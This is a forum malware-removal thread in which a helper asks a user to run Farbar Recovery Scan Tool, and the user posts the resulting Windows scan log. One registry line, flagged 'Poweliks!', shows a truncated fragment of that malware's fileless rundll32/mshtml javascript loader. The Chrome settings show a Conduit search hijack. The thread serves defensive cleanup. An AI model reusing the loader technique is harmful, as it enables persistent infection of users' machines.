2014-09-13 01:58:18 77312 ----a-w- C:\Windows\System32\packager.dll
2014-09-13 01:40:05 67072 ----a-w- C:\Windows\SysWow64\packager.dll
2014-09-09 22:11:04 2048 ----a-w- C:\Windows\System32\tzres.dll
2014-09-09 21:47:10 2048 ----a-w- C:\Windows\SysWow64\tzres.dll
2014-09-05 02:11:09 6584320 ----a-w- C:\Windows\System32\mstscax.dll
2014-09-05 01:52:41 5703168 ----a-w- C:\Windows\SysWow64\mstscax.dll
2014-09-04 05:23:20 424448 ----a-w- C:\Windows\System32\rastls.dll
2014-09-04 05:04:15 372736 ----a-w- C:\Windows\SysWow64\rastls.dll
2014-08-29 02:07:13 3179520 ----a-w- C:\Windows\System32\rdpcorets.dll
2014-08-23 02:07:00 404480 ----a-w- C:\Windows\System32\gdi32.dll
2014-08-23 01:45:55 311808 ----a-w- C:\Windows\SysWow64\gdi32.dll
2014-08-20 02:43:42 15294296 ----a-w- C:\Windows\SysWow64\nvcompiler.dll
2014-08-20 02:43:40 22994208 ----a-w- C:\Windows\System32\nvcompiler.dll
2014-08-20 02:43:38 3196816 ----a-w- C:\Windows\System32\nvapi64.dll
2014-08-20 02:43:38 2814656 ----a-w- C:\Windows\SysWow64\nvapi.dll
2014-08-19 03:10:10 616352 ----a-w- C:\Windows\System32\winresume.efi
2014-08-19 03:08:04 503808 ----a-w- C:\Windows\System32\srcore.dll
2014-08-19 03:08:04 50176 ----a-w- C:\Windows\System32\srclient.dll
2014-08-19 03:08:03 63488 ----a-w- C:\Windows\System32\setbcdlocale.dll
2014-08-19 03:07:51 58880 ----a-w- C:\Windows\System32\appidapi.dll
2014-08-19 03:07:51 32256 ----a-w- C:\Windows\System32\appidsvc.dll
2014-08-19 03:07:33 296960 ----a-w- C:\Windows\System32\rstrui.exe
2014-08-19 03:07:11 17920 ----a-w- C:\Windows\System32\appidcertstorecheck.exe
2014-08-19 03:07:11 146944 ----a-w- C:\Windows\System32\appidpolicyconverter.exe
2014-08-19 02:41:39 43008 ----a-w- C:\Windows\SysWow64\srclient.dll
2014-08-19 02:41:22 50688 ----a-w- C:\Windows\SysWow64\appidapi.dll
2014-08-19 02:06:56 61440 ----a-w- C:\Windows\System32\drivers\appid.sys
.
============= FINISH: 15:06:14.87 ===============

 

 

Attached Files



BC AdBot (Login to Remove)

 


m

#2 nasdaq

nasdaq

  • Malware Response Team
  • 38,257 posts
  • ONLINE
  •  
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:08:09 AM

Posted 05 November 2014 - 09:18 AM

Hello, Welcome to BleepingComputer.
I'm nasdaq and will be helping you.

If you can please print this topic it will make it easier for you to follow the instructions and complete all of the necessary steps in the order listed.
===

Download the version of this tool for your operating system.
Farbar Recovery Scan Tool (64 bit)
Farbar Recovery Scan Tool (32 bit)
and save it to a folder on your computer's Desktop.
Double-click to run it. When the tool opens click Yes to disclaimer.
Press Scan button.
It will make a log (FRST.txt) in the same directory the tool is run. Please copy and paste it to your reply.
The first time the tool is run, it makes also another log (Addition.txt). Please attach it to your reply.
===

Please paste the logs in your next reply DO NOT ATTACH THEM unless specified.
To attach a file select the "More Reply Option" and follow the instructions.


Wait for further instructions.

#3 jmantowin

jmantowin
  • Topic Starter

  • Members
  • 15 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:08:09 AM

Posted 05 November 2014 - 10:41 AM

Thank you for agreeing to help. I greatly appreciate it!

 

 

Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 04-11-2014
Ran by JoseAlcazar (administrator) on JOSEALCAZAR-PC on 05-11-2014 10:37:05
Running from C:\Users\JoseAlcazar\Videos\virus\Bleepinghelp
Loaded Profile: JoseAlcazar (Available profiles: JoseAlcazar & Guest)
Platform: Windows 7 Home Premium Service Pack 1 (X64) OS Language: English (United States)
Internet Explorer Version 11
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(Andrea Electronics Corporation) C:\Program Files\Realtek\Audio\HDA\AERTSr64.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Atheros Commnucations) C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\AdminService.exe
(Microsoft Corporation.) C:\Program Files (x86)\Microsoft\BingBar\7.3.132.0\BBSvc.EXE
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Intel® Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe
(Symantec Corporation) C:\Program Files (x86)\Norton Security Suite\Engine\21.6.0.32\n360.exe
(Dell, Inc.) C:\Program Files (x86)\Dell\Dell Datasafe Online\NOBuAgent.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
(SoftThinks SAS) C:\Program Files (x86)\Dell DataSafe Local Backup\SftService.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Atheros) C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\Ath_CoexAgent.exe
(Atheros) C:\Program Files (x86)\Dell Wireless\Ath_WlanAgent.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\NvTmru.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe
(Atheros Commnucations) C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\AthBtTray.exe
(Dell) C:\Users\JoseAlcazar\AppData\Local\Apps\2.0\T64K68GD.AMZ\O6XZMXTD.PV6\dell..tion_e30b47f5d4a30e9e_0005.000c_1df9a4898fae00de\DellSystemDetect.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe
(Alcor Micro Corp.) C:\Program Files (x86)\Multimedia Card Reader(9106)\ShwiconXP9106.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Adobe\Acrobat 9.0\Acrobat\acrobat_sl.exe
(Adobe Systems Inc.) C:\Program Files (x86)\Adobe\Acrobat 9.0\Acrobat\acrotray.exe
(Symantec Corporation) C:\Program Files (x86)\Norton Security Suite\Engine\21.6.0.32\n360.exe
(SoftThinks - Dell) C:\Program Files (x86)\Dell DataSafe Local Backup\Toaster.exe
() C:\Program Files (x86)\Dell DataSafe Local Backup\Components\Scheduler\STService.exe
(Nullsoft, Inc.) C:\Program Files (x86)\Winamp\winampa.exe
(Apple Inc.) C:\Program Files (x86)\iTunes\iTunesHelper.exe
(SoftThinks - Dell) C:\Program Files (x86)\Dell DataSafe Local Backup\Components\DSUpdate\DSUpd.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
() C:\Program Files (x86)\DivX\DivX Update\DivXUpdate.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe

==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [6457960 2011-12-23] (Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1156712 2011-11-15] (Realtek Semiconductor)
HKLM\...\Run: [Nvtmru] => C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\nvtmru.exe [1028384 2013-11-14] (NVIDIA Corporation)
HKLM\...\Run: [ShadowPlay] => C:\Windows\system32\rundll32.exe C:\Windows\system32\nvspcap64.dll,ShadowPlayOnSystemStart
HKLM\...\Run: [NvBackend] => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe [2273056 2013-11-29] (NVIDIA Corporation)
HKLM\...\Run: [AtherosBtStack] => C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\btvstack.exe [1023104 2012-12-27] (Atheros Commnucations)
HKLM\...\Run: [AthBtTray] => C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\athbttray.exe [801920 2012-12-27] (Atheros Commnucations)
HKLM-x32\...\Run: [IAStorIcon] => C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe [284440 2012-02-01] (Intel Corporation)
HKLM-x32\...\Run: [USB3MON] => C:\Program Files (x86)\Intel\Intel® USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe [291608 2012-02-17] (Intel Corporation)
HKLM-x32\...\Run: [ShwiconXP9106] => C:\Program Files (x86)\Multimedia Card Reader(9106)\ShwiconXP9106.exe [237568 2010-03-10] (Alcor Micro Corp.)
HKLM-x32\...\Run: [Dell DataSafe Online] => C:\Program Files (x86)\Dell\Dell Datasafe Online\NOBuClient.exe [1117528 2010-08-25] (Dell, Inc.)
HKLM-x32\...\Run: [Adobe Reader Speed Launcher] => C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Reader_sl.exe [40336 2014-09-04] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959176 2014-08-21] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [GrooveMonitor] => C:\Program Files (x86)\Microsoft Office\Office12\GrooveMonitor.exe [30040 2009-02-26] (Microsoft Corporation)
HKLM-x32\...\Run: [AdobeCS4ServiceManager] => C:\Program Files (x86)\Common Files\Adobe\CS4ServiceManager\CS4ServiceManager.exe [611712 2008-08-14] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [Adobe Acrobat Speed Launcher] => C:\Program Files (x86)\Adobe\Acrobat 9.0\Acrobat\Acrobat_sl.exe [44128 2013-05-08] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [Acrobat Assistant 8.0] => C:\Program Files (x86)\Adobe\Acrobat 9.0\Acrobat\Acrotray.exe [642664 2013-05-08] (Adobe Systems Inc.)
HKLM-x32\...\Run: [Adobe_ID0ENQBO] => C:\Program Files (x86)\Common Files\Adobe\Adobe Version Cue CS4\Server\bin\VersionCueCS4Tray.exe [378224 2008-08-15] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [WinampAgent] => C:\Program Files (x86)\Winamp\winampa.exe [74752 2012-06-28] (Nullsoft, Inc.)
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [59720 2013-09-13] (Apple Inc.)
HKLM-x32\...\Run: [iTunesHelper] => C:\Program Files (x86)\iTunes\iTunesHelper.exe [152392 2013-09-17] (Apple Inc.)
HKLM-x32\...\Run: [DivXMediaServer] => C:\Program Files (x86)\DivX\DivX Media Server\DivXMediaServer.exe [450560 2013-12-22] (DivX, LLC)
HKLM-x32\...\Run: [DivXUpdate] => C:\Program Files (x86)\DivX\DivX Update\DivXUpdate.exe [1861968 2013-11-14] ()
HKLM-x32\...\Run: [QuickTime Task] => C:\Program Files (x86)\QuickTime\QTTask.exe [421888 2014-07-06] (Apple Inc.)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [271744 2014-09-26] (Oracle Corporation)
HKLM\...\Policies\Explorer: [NoControlPanel] 0
HKU\S-1-5-21-3020843540-2314379756-2588281441-1001\...\Run: [DellSystemDetect] => C:\Users\JoseAlcazar\AppData\Local\Apps\2.0\T64K68GD.AMZ\O6XZMXTD.PV6\dell..tion_e30b47f5d4a30e9e_0005.000c_1df9a4898fae00de\DellSystemDetect.exe [264488 2014-10-25] (Dell)
HKU\S-1-5-21-3020843540-2314379756-2588281441-1001\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
ShellIconOverlayIdentifiers: [OverlayExcluded] -> {4433A54A-1AC8-432F-90FC-85F045CF383C} => C:\Program Files (x86)\Norton Security Suite\Engine64\21.6.0.32\buShell.dll (Symantec Corporation)
ShellIconOverlayIdentifiers: [OverlayPending] -> {F17C0B1E-EF8E-4AD4-8E1B-7D7E8CB23225} => C:\Program Files (x86)\Norton Security Suite\Engine64\21.6.0.32\buShell.dll (Symantec Corporation)
ShellIconOverlayIdentifiers: [OverlayProtected] -> {476D0EA3-80F9-48B5-B70B-05E677C9C148} => C:\Program Files (x86)\Norton Security Suite\Engine64\21.6.0.32\buShell.dll (Symantec Corporation)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = https://www.yahoo.com/
HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://g.msn.com/USCON/1
SearchScopes: HKCU - {38DD1A52-F201-4106-B199-A89A0F4F18D1} URL =
SearchScopes: HKCU - {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL =
BHO: Bing Bar Helper -> {1dad3af3-ef2f-4f64-ac4b-11789189fcb6} -> C:\Program Files (x86)\Microsoft\BingBar\7.3.132.0\amd64\BingExt.dll (Microsoft Corporation.)
BHO: Norton Identity Protection -> {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} -> C:\Program Files (x86)\Norton Security Suite\Engine64\21.6.0.32\coIEPlg.dll (Symantec Corporation)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
BHO-x32: Bing Bar Helper -> {1dad3af3-ef2f-4f64-ac4b-11789189fcb6} -> C:\Program Files (x86)\Microsoft\BingBar\7.3.132.0\BingExt.dll (Microsoft Corporation.)
BHO-x32: Norton Identity Protection -> {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} -> C:\Program Files (x86)\Norton Security Suite\Engine\21.6.0.32\coIEPlg.dll (Symantec Corporation)
BHO-x32: Norton Vulnerability Protection -> {6D53EC84-6AAE-4787-AEEE-F4628F01010C} -> C:\Program Files (x86)\Norton Security Suite\Engine\21.6.0.32\IPS\IPSBHO.DLL (Symantec Corporation)
BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office12\GrooveShellExtensions.dll (Microsoft Corporation)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation)
BHO-x32: CIESpeechBHO Class -> {8D10F6C4-0E01-4BD4-8601-11AC1FDF8126} -> C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\IEPlugIn.dll (Atheros Commnucations)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO-x32: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
BHO-x32: Adobe PDF Conversion Toolbar Helper -> {AE7CD045-E861-484f-8273-0445EE161910} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll (Adobe Systems Incorporated)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
BHO-x32: SmartSelect Class -> {F4971EE7-DAA0-4053-9964-665D8EE6A077} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll (Adobe Systems Incorporated)
Toolbar: HKLM - Norton Toolbar - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton Security Suite\Engine64\21.6.0.32\coIEPlg.dll (Symantec Corporation)
Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
Toolbar: HKLM - Bing Bar - {eec0f710-38b5-4aba-99bf-ec87564a4e13} - C:\Program Files (x86)\Microsoft\BingBar\7.3.132.0\amd64\BingExt.dll (Microsoft Corporation.)
Toolbar: HKLM-x32 - Adobe PDF - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll (Adobe Systems Incorporated)
Toolbar: HKLM-x32 - Norton Toolbar - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton Security Suite\Engine\21.6.0.32\coIEPlg.dll (Symantec Corporation)
Toolbar: HKLM-x32 - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
Toolbar: HKLM-x32 - Bing Bar - {eec0f710-38b5-4aba-99bf-ec87564a4e13} - C:\Program Files (x86)\Microsoft\BingBar\7.3.132.0\BingExt.dll (Microsoft Corporation.)
Toolbar: HKCU - No Name - {47833539-D0C5-4125-9FA8-0819E2EAAC93} -  No File
DPF: HKLM-x32 {02BF25D5-8C17-4B23-BC80-D3488ABDDC6B} http://qtinstall.apple.com/qtactivex/qtplugin.cab
Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll (Skype Technologies)
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1

FireFox:
========
FF Plugin: @divx.com/DivX VOD Helper,version=1.0.0 -> C:\Program Files\DivX\DivX OVS Helper\npovshelper.dll (DivX, LLC.)
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF32.dll No File
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin-x32: @divx.com/DivX VOD Helper,version=1.0.0 -> C:\Program Files (x86)\DivX\DivX OVS Helper\npovshelper.dll (DivX, LLC.)
FF Plugin-x32: @divx.com/DivX Web Player Plug-In,version=1.0.0 -> C:\Program Files (x86)\DivX\DivX Web Player\npdivx32.dll (DivX, LLC)
FF Plugin-x32: @java.com/DTPlugin,version=10.71.2 -> C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.71.2 -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3508.1109 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll (NVIDIA Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.0.3 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin-x32: Adobe Acrobat -> C:\Program Files (x86)\Adobe\Acrobat 9.0\Acrobat\Air\nppdf32.dll (Adobe Systems Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF HKLM-x32\...\Firefox\Extensions: [{BBDA0591-3099-440a-AA10-41764D9DB4DB}] - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\N360_21.1.0.18\IPSFF
FF Extension: Norton Vulnerability Protection - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\N360_21.1.0.18\IPSFF [2013-12-27]
FF HKLM-x32\...\Firefox\Extensions: [{2D3F3651-74B9-4795-BDEC-6DA2F431CB62}] - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\N360_21.1.0.18\coFFPlgn
FF Extension: Norton Toolbar - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\N360_21.1.0.18\coFFPlgn [2014-11-05]
FF HKLM-x32\...\Thunderbird\Extensions: [msktbird@mcafee.com] - C:\Program Files\McAfee\MSK

Chrome:
=======
CHR HomePage: Default -> https://www.yahoo.com/
CHR StartupUrls: Default -> "hxxp://www.yahoo.com/"
CHR DefaultSearchKeyword: Default -> conduit.search
CHR DefaultSearchURL: Default -> http://search.conduit.com/Results.aspx?ctid=CT3320691&octid=EB_ORIGINAL_CTID&SearchSource=58&CUI=&UM=4&UP=SPC9E6EF2F-5A94-4006-916C-319ED897D608&q={searchTerms}&SSPV=
CHR DefaultSuggestURL: Default -> http://suggest.search.conduit.com/CSuggestJson.ashx?prefix={searchTerms}
CHR Profile: C:\Users\JoseAlcazar\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Docs) - C:\Users\JoseAlcazar\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2013-10-16]
CHR Extension: (Google Drive) - C:\Users\JoseAlcazar\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2013-10-16]
CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\JoseAlcazar\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-05-24]
CHR Extension: (YouTube) - C:\Users\JoseAlcazar\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2013-10-16]
CHR Extension: (Google Search) - C:\Users\JoseAlcazar\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2013-10-16]
CHR Extension: (Google Wallet) - C:\Users\JoseAlcazar\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-01-26]
CHR Extension: (Gmail) - C:\Users\JoseAlcazar\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2013-10-16]

==================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

S3 Adobe Version Cue CS4; C:\Program Files (x86)\Common Files\Adobe\Adobe Version Cue CS4\Server\bin\VersionCueCS4.exe [284016 2008-08-15] (Adobe Systems Incorporated)
S2 DellDigitalDelivery; C:\Program Files (x86)\Dell Digital Delivery\DeliveryService.exe [173056 2012-08-02] (Dell Products, LP.) [File not signed]
R2 MBAMScheduler; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [1871160 2014-10-01] (Malwarebytes Corporation)
R2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [968504 2014-10-01] (Malwarebytes Corporation)
R2 N360; C:\Program Files (x86)\Norton Security Suite\Engine\21.6.0.32\N360.exe [265040 2014-10-02] (Symantec Corporation)
R2 NvNetworkService; C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe [1370912 2013-11-29] (NVIDIA Corporation)
R2 NvStreamSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe [15128352 2013-11-29] (NVIDIA Corporation)
R2 ZAtheros Bt and Wlan Coex Agent; C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\Ath_CoexAgent.exe [327296 2012-12-27] (Atheros)
R2 ZAtheros Wlan Agent; C:\Program Files (x86)\Dell Wireless\Ath_WlanAgent.exe [81536 2012-12-26] (Atheros)

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R1 BHDrvx64; C:\Program Files (x86)\Norton Security Suite\NortonData\21.1.0.18\Definitions\BASHDefs\20141030.001\BHDrvx64.sys [1587416 2014-10-03] (Symantec Corporation)
R1 ccSet_N360; C:\Windows\system32\drivers\N360x64\1506000.020\ccSetx64.sys [162392 2013-09-25] (Symantec Corporation)
R1 eeCtrl; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\eeCtrl64.sys [487216 2014-09-09] (Symantec Corporation)
R3 EraserUtilRebootDrv; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys [142640 2014-09-09] (Symantec Corporation)
R1 IDSVia64; C:\Program Files (x86)\Norton Security Suite\NortonData\21.1.0.18\Definitions\IPSDefs\20141103.001\IDSvia64.sys [633560 2014-08-29] (Symantec Corporation)
S3 mbamchameleon; C:\Windows\system32\drivers\mbamchameleon.sys [93400 2014-10-01] (Malwarebytes Corporation)
